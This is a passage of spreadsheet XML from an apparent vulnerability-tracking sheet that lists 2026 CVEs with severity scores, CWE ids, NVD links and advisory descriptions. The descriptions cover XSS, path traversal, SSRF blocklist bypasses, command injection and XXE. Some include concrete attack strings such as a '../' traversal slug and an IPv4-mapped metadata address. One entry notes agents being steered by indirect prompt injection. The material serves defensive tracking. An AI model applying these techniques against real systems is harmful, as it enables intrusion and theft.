          <t>wetty provides terminal access in browser over http/https. Prior to version 3.0.4, the wetty client decodes a base64 filename from the file-download escape sequence and interpolates it raw into a Toastify HTML string (`escapeMarkup: false`). Any output the victim renders - a `cat`'d file, a tailed log, an SSH MOTD, a `curl` response - that contains `\x1b[5i...:...\x1b[4i` runs script in the wetty origin and types attacker-chosen keystrokes into the victim's SSH session. Version 3.0.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M1395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49864</t>
        </is>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50553</t>
        </is>
      </c>
      <c r="C1396" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1396" s="5" t="inlineStr"/>
      <c r="F1396" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1396" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1396" s="5" t="inlineStr"/>
      <c r="I1396" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1396" s="5" t="inlineStr"/>
      <c r="K1396" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="L1396" s="5" t="inlineStr">
        <is>
          <t>Note Mark is an open-source note-taking application. Prior to version 0.19.5, Note Mark validates book and note slug values with the OpenAPI/huma tag pattern:"[a-z0-9-]+". huma compiles this with regexp.MustCompile(s.Pattern) and tests it with patternRe.MatchString(str), an UNANCHORED match. Because the pattern is not anchored (^...$), any string that merely CONTAINS one [a-z0-9-] substring passes validation. A slug such as ../../../../../../tmp/escape is accepted and stored verbatim. The data-export CLI commands (note-mark migrate export and note-mark migrate export-v1) join these unsanitized slugs straight into the output path with path.Join / filepath.Join, then os.MkdirAll the directory and os.Create the note file. path.Join resolves the ../ segments, so the note content file is written OUTSIDE the configured export directory. The export process commonly runs as root (default in Docker / bare-metal admin usage), so this is a root-privilege arbitrary directory create + file write. This issue has been patched in version 0.19.5.</t>
        </is>
      </c>
      <c r="M1396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50553</t>
        </is>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52776</t>
        </is>
      </c>
      <c r="C1397" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1397" s="5" t="inlineStr"/>
      <c r="F1397" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1397" s="5" t="inlineStr"/>
      <c r="H1397" s="5" t="inlineStr"/>
      <c r="I1397" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1397" s="5" t="inlineStr"/>
      <c r="K1397" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="L1397" s="5" t="inlineStr">
        <is>
          <t>Compliance-trestle (Trestle) is a tooling platform for managing compliance as code. In versions before 3.12.4 and versions 4.0.0 through 4.0.3, the URLSecurityValidator that guards trestle's remote-fetch paths against server-side request forgery can be bypassed to reach loopback, link-local, cloud-metadata, and internal network endpoints it was designed to block. The blocklist does not canonicalize IPv4-mapped IPv6 literals such as [::ffff:169.254.169.254], which resolve to IPv6Address objects that never match the blocked IPv4 ranges, and it does not block the unspecified address 0.0.0.0, which routes to local services on Linux and inside containers. An attacker who can supply or influence an OSCAL artifact that trestle fetches, such as a malicious profile whose imports reference one of these bypass URLs, can cause the HTTPSFetcher and SFTPFetcher paths to contact cloud instance-metadata services, loopback interfaces, or internal hosts. This issue is fixed in versions 3.12.4 and 4.1.0.</t>
        </is>
      </c>
      <c r="M1397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52776</t>
        </is>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52854</t>
        </is>
      </c>
      <c r="C1398" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1398" s="5" t="inlineStr"/>
      <c r="F1398" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1398" s="5" t="inlineStr"/>
      <c r="H1398" s="5" t="inlineStr"/>
      <c r="I1398" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1398" s="5" t="inlineStr"/>
      <c r="K1398" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-80</t>
        </is>
      </c>
      <c r="L1398" s="5" t="inlineStr">
        <is>
          <t>Maps is a MediaWiki extension that enables visualization of geographic data through dynamic embedded maps. Prior to version 12.1.3, the display_map parser function in the Leaflet service accepts attacker-controlled HTML in the overlays parameter, and resources/leaflet/jquery.leaflet.js uses the overlay name as a Leaflet layer-control label without escaping it. A wiki user with the edit permission can store malicious wikitext that causes script execution when another user previews or views the affected map. The script executes in the viewing user's browser session and can access data or perform actions available to that user. This issue is fixed in version 12.1.3.</t>
        </is>
      </c>
      <c r="M1398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52854</t>
        </is>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53455</t>
        </is>
      </c>
      <c r="C1399" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1399" s="5" t="inlineStr"/>
      <c r="F1399" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1399" s="5" t="inlineStr"/>
      <c r="H1399" s="5" t="inlineStr"/>
      <c r="I1399" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1399" s="5" t="inlineStr"/>
      <c r="K1399" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1399" s="5" t="inlineStr">
        <is>
          <t>Blueprint Studio is a VS Code-like file editor for Home Assistant configuration files. Prior to 2.5.2, Blueprint Studio generated a shell-based Git credential helper in custom_components/blueprint_studio/backend/git_manager.py by interpolating the configured Git username and token directly into executable helper script content without validating credential values. An attacker able to set Git credentials could include newline characters or shell syntax in a username or token. When Git executed the generated credential helper, the injected shell commands ran with the operating-system privileges of Home Assistant and could access or modify Home Assistant configuration data. This issue is fixed in version 2.5.2.</t>
        </is>
      </c>
      <c r="M1399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53455</t>
        </is>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53783</t>
        </is>
      </c>
      <c r="C1400" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1400" s="5" t="inlineStr"/>
      <c r="F1400" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1400" s="5" t="inlineStr"/>
      <c r="H1400" s="5" t="inlineStr"/>
      <c r="I1400" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1400" s="5" t="inlineStr"/>
      <c r="K1400" s="5" t="inlineStr">
        <is>
          <t>CWE-59, CWE-88</t>
        </is>
      </c>
      <c r="L1400" s="5" t="inlineStr">
        <is>
          <t>rsync before 3.5.0 contains a time-of-check to time-of-use (TOCTOU) race condition vulnerability in the rrsync restricted shell wrapper that allows authenticated clients to escape enforced directory restrictions by substituting a symlink for a path component after validation but before transfer processing. Attackers can additionally leverage unrestricted flags such as --copy-unsafe-links, -D, and --log-file through rrsync to read or write files outside the permitted directory subtree.</t>
        </is>
      </c>
      <c r="M1400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53783</t>
        </is>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54511</t>
        </is>
      </c>
      <c r="C1401" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1401" s="5" t="inlineStr"/>
      <c r="F1401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1401" s="5" t="inlineStr"/>
      <c r="H1401" s="5" t="inlineStr"/>
      <c r="I1401" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1401" s="5" t="inlineStr"/>
      <c r="K1401" s="5" t="inlineStr">
        <is>
          <t>CWE-117, CWE-93</t>
        </is>
      </c>
      <c r="L1401" s="5" t="inlineStr">
        <is>
          <t>LogTape is an unobtrusive logging library. Prior to 1.3.11, 2.0.14, and 2.1.5, the @logtape/syslog package's escapeStructuredDataValue() function in packages/syslog/src/syslog.ts does not neutralize C0 control characters from U+0000 through U+001F in structured data values, and formatStructuredData() inserts property keys without validating the RFC 5424 SD-NAME grammar. When includeStructuredData is true, an attacker-controlled newline can terminate an RFC 6587 non-transparent TCP syslog frame and make following bytes appear as a forged RFC 5424 record, while a key containing a closing bracket or other forbidden character can terminate or corrupt the structured-data element. Applications that forward attacker-controlled property values or keys can therefore allow forged records with arbitrary hosts, applications, process identifiers, facilities, or severity levels, undermining downstream collector and SIEM integrity. This issue is fixed in versions 1.3.11, 2.0.14, and 2.1.5.</t>
        </is>
      </c>
      <c r="M1401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54511</t>
        </is>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54603</t>
        </is>
      </c>
      <c r="C1402" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1402" s="5" t="inlineStr"/>
      <c r="F1402" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1402" s="5" t="inlineStr"/>
      <c r="H1402" s="5" t="inlineStr"/>
      <c r="I1402" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J1402" s="5" t="inlineStr"/>
      <c r="K1402" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-601</t>
        </is>
      </c>
      <c r="L1402" s="5" t="inlineStr">
        <is>
          <t>OAuth2 is a Ruby wrapper for the OAuth 2.0 and 2.1 authorization frameworks, including OpenID Connect (OIDC). From 0.4.0 to 2.0.21, a protocol-relative redirect Location returned to OAuth2::Client#request overrides the request authority, so the bearer Authorization header is sent to an attacker-controlled host, leaking the credential. This issue is fixed in version 2.0.22.</t>
        </is>
      </c>
      <c r="M1402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54603</t>
        </is>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54650</t>
        </is>
      </c>
      <c r="C1403" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1403" s="5" t="inlineStr"/>
      <c r="F1403" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1403" s="5" t="inlineStr"/>
      <c r="H1403" s="5" t="inlineStr"/>
      <c r="I1403" s="5" t="inlineStr">
        <is>
          <t>2026-07-28</t>
        </is>
      </c>
      <c r="J1403" s="5" t="inlineStr"/>
      <c r="K1403" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1403" s="5" t="inlineStr">
        <is>
          <t>openhole exposes localhost to the internet in one command. In 0.1.1 and earlier, openhole-server in internal/server/public_proxy.go forwarded r.URL.Path instead of preserving the original request target with r.URL.EscapedPath(), allowing percent encoded dot segments %2e and separators %2f to reach tunneled local services as ../ and / for path traversal. This issue is fixed in version 0.1.2.</t>
        </is>
      </c>
      <c r="M1403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54650</t>
        </is>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54730</t>
        </is>
      </c>
      <c r="C1404" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1404" s="5" t="inlineStr"/>
      <c r="F1404" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1404" s="5" t="inlineStr"/>
      <c r="H1404" s="5" t="inlineStr"/>
      <c r="I1404" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1404" s="5" t="inlineStr"/>
      <c r="K1404" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-807</t>
        </is>
      </c>
      <c r="L1404" s="5" t="inlineStr">
        <is>
          <t>authentik is an open-source identity provider. Prior to 2026.2.6 and 2026.5.5, the enterprise Google Chrome device-trust stages advance the flow without confirming that the out-of-band device attestation actually ran. Affected enterprise deployments place either a Google Chrome Endpoint stage with mode set to REQUIRED or the deprecated Google Chrome Device Trust Connector stage in an authentication flow. The device attestation occurs in a verification iframe that calls the Google Verified Access API and records the verified device on success, but the vulnerable stages treat the flow as passed as soon as the stage is submitted. An attacker who can reach such a stage, including after primary username and password authentication, can skip the verification iframe and authenticate from a device that was never verified. Where device trust is the only additional factor, that protection is fully bypassed, while other configured factors remain in force. This issue is fixed in versions 2026.2.6 and 2026.5.5.</t>
        </is>
      </c>
      <c r="M1404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54730</t>
        </is>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55182</t>
        </is>
      </c>
      <c r="C1405" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1405" s="5" t="inlineStr"/>
      <c r="F1405" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1405" s="5" t="inlineStr"/>
      <c r="H1405" s="5" t="inlineStr"/>
      <c r="I1405" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1405" s="5" t="inlineStr"/>
      <c r="K1405" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1405" s="5" t="inlineStr">
        <is>
          <t>LibreNMS is a network monitoring system. In versions from 21.6.0 up to 26.5.0, the Signal alert transport is vulnerable to command injection because the signal-cli path and the Recipient field of an alert transport entry are insufficiently escaped before being passed to an exec call. An authenticated administrator can craft a transport entry whose Recipient contains shell metacharacters and whose path points to the bundled composer_wrapper.php script, which itself passes attacker-controlled input to further unsafe exec calls. By chaining these calls, the administrator can execute arbitrary operating-system commands on the LibreNMS host. This issue is fixed in version 26.5.0.</t>
        </is>
      </c>
      <c r="M1405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55182</t>
        </is>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55534</t>
        </is>
      </c>
      <c r="C1406" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1406" s="5" t="inlineStr"/>
      <c r="F1406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1406" s="5" t="inlineStr"/>
      <c r="H1406" s="5" t="inlineStr"/>
      <c r="I1406" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1406" s="5" t="inlineStr"/>
      <c r="K1406" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1406" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. From praisonai 4.6.34 until 4.6.58, praisonai serve agents accepts --api-key but _create_agents_app() does not authenticate POST /agents or POST /agents/{agent_name}. A network caller can invoke configured agents without credentials even when an API key was supplied. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M1406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55534</t>
        </is>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55539</t>
        </is>
      </c>
      <c r="C1407" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1407" s="5" t="inlineStr"/>
      <c r="F1407" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1407" s="5" t="inlineStr"/>
      <c r="H1407" s="5" t="inlineStr"/>
      <c r="I1407" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1407" s="5" t="inlineStr"/>
      <c r="K1407" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1407" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to praisonai 4.6.51, the Jobs API create_app function mounts /api/v1/runs without authentication. Any reachable caller can submit jobs, read results, cancel runs, or delete jobs using operator credentials. The fix adds PRAISONAI_JOBS_API_KEY middleware for Authorization or X-API-Key. This issue is fixed in version 4.6.58.</t>
        </is>
      </c>
      <c r="M1407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55539</t>
        </is>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55557</t>
        </is>
      </c>
      <c r="C1408" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1408" s="5" t="inlineStr"/>
      <c r="F1408" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1408" s="5" t="inlineStr"/>
      <c r="H1408" s="5" t="inlineStr"/>
      <c r="I1408" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1408" s="5" t="inlineStr"/>
      <c r="K1408" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1408" s="5" t="inlineStr">
        <is>
          <t>browse-mcp is a Playwright-based headless-browser MCP server for MCP-capable agents. Prior to 0.8.2, browser_download writes a fetched response body to join(save_dir, filename) without validating the caller-controlled save_dir, while browser_save_state and browser_load_state honor a caller-controlled path unchanged. A malicious MCP client, or an autonomous agent steered by indirect prompt injection on a visited page, can choose an arbitrary save_dir or state path and a URL whose response body becomes attacker-controlled file contents, allowing writes to any path the process can reach, including ~/.bashrc, autostart entries, or cron files, and potentially leading to host code execution. The force_fetch fallback also uses a raw fetch() that bypasses the BROWSE_MCP_ALLOWED_ORIGINS origin fence. This issue is fixed in version 0.8.2.</t>
        </is>
      </c>
      <c r="M1408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55557</t>
        </is>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55580</t>
        </is>
      </c>
      <c r="C1409" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1409" s="5" t="inlineStr"/>
      <c r="F1409" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1409" s="5" t="inlineStr"/>
      <c r="H1409" s="5" t="inlineStr"/>
      <c r="I1409" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1409" s="5" t="inlineStr"/>
      <c r="K1409" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1409" s="5" t="inlineStr">
        <is>
          <t>mcp-shell is an MCP server for running shell commands securely, auditably, and on demand. Prior to 0.6.0, config.go initializes Security.Enabled to false, and when MCP_SHELL_SEC_CONFIG_FILE is unset, main.go starts the documented bare-binary deployment without a security policy. SecurityValidator.validateCommand in security.go then short-circuits and allows every command supplied to the shell_exec MCP tool, so an LLM connected over stdio can execute unrestricted OS commands as the mcp-shell process user. The README from-source installation and MCP client configuration omit MCP_SHELL_SEC_CONFIG_FILE, making the insecure state the documented default. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M1409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55580</t>
        </is>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55848</t>
        </is>
      </c>
      <c r="C1410" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1410" s="5" t="inlineStr"/>
      <c r="F1410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1410" s="5" t="inlineStr">
        <is>
          <t>java, kubernetes</t>
        </is>
      </c>
      <c r="H1410" s="5" t="inlineStr"/>
      <c r="I1410" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1410" s="5" t="inlineStr"/>
      <c r="K1410" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L1410" s="5" t="inlineStr">
        <is>
          <t>mapfish-print is a component of MapFish for printing templated cartographic maps. Prior to 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5, MapFish Print accepts an attacker-controlled GML layer url in requests to the /api/print3/print endpoint and fetches XML parsed by core/src/main/java/org/mapfish/print/map/geotools/GmlLayer.java without disabling external entities and external DTDs. A remote XML document and DTD can expand a local file entity, and the resulting content can be exposed through the GML parsing and error path. This allows unauthenticated attackers to read files such as operating-system account data, Kubernetes service-account tokens, and certificates. Replacing the file entity target with an internal HTTP endpoint also permits server-side request forgery. This issue is fixed in versions 3.28.30, 3.30.32, 3.31.24, 3.33.16, and 4.0.5.</t>
        </is>
      </c>
      <c r="M1410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55848</t>
        </is>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56703</t>
        </is>
      </c>
      <c r="C1411" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1411" s="5" t="inlineStr"/>
      <c r="F1411" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1411" s="5" t="inlineStr"/>
      <c r="H1411" s="5" t="inlineStr"/>
      <c r="I1411" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J1411" s="5" t="inlineStr"/>
      <c r="K1411" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1411" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 contains a remote code execution vulnerability in SQLite query handling where VACUUM INTO is not blocked despite ATTACH restrictions. Authenticated attackers can execute VACUUM INTO to write PHP code to arbitrary file paths and execute commands on the server.</t>
        </is>
      </c>
      <c r="M1411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56703</t>
        </is>
      </c>
    </row>
    <row r="1412">
      <c r="A1412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56711</t>
        </is>
      </c>
      <c r="C1412" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1412" s="5" t="inlineStr"/>
      <c r="F1412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1412" s="5" t="inlineStr"/>
      <c r="H1412" s="5" t="inlineStr"/>
      <c r="I1412" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1412" s="5" t="inlineStr"/>
      <c r="K1412" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="L1412" s="5" t="inlineStr">
        <is>
          <t>VLC media player computes the size of a picture buffer with 32-bit arithmetic and allocates from the wrapped result. In AllocatePicture in src/misc/picture.c the running total is accumulated as i_bytes += p-&gt;i_pitch * p-&gt;i_lines, and both plane_t fields are declared int in include/vlc_picture.h, so the multiplication is evaluated at 32 bits and wraps before it is widened to the size_t accumulator. The overflow check that precedes it divides in 64-bit arithmetic and therefore does not constrain the product, and the subsequent comparison against PICTURE_SW_SIZE_MAX examines the already wrapped value, so both guards pass. aligned_alloc then reserves the small wrapped size while the decoder writes scanlines sized from the original dimensions. A crafted PNG whose IHDR declares large width and height reaches this path through the image demuxer, whose only size guard is on the input file's byte count rather than the declared dimensions, and the decoder in modules/codec/png.c writes past the end of the allocation with attacker-influenced length and content. Opening the file directly or through a playlist entry is sufficient, with no non-default settings.</t>
        </is>
      </c>
      <c r="M1412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56711</t>
        </is>
      </c>
    </row>
    <row r="1413">
      <c r="A1413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58014</t>
        </is>
      </c>
      <c r="C1413" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1413" s="5" t="inlineStr"/>
      <c r="F1413" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1413" s="5" t="inlineStr"/>
      <c r="H1413" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1413" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1413" s="5" t="inlineStr"/>
      <c r="K1413" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="L1413" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. An off-by-one error can occur in the g_key_file_get_locale_string_list function in the gkeyfile.c file when loading a key file with an empty value. This flaw can cause an out-of-bounds access of 1 byte or a denial of service when the out-of-bounds access crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58014</t>
        </is>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61517</t>
        </is>
      </c>
      <c r="C1414" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1414" s="5" t="inlineStr"/>
      <c r="F1414" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G1414" s="5" t="inlineStr"/>
      <c r="H1414" s="5" t="inlineStr"/>
      <c r="I1414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
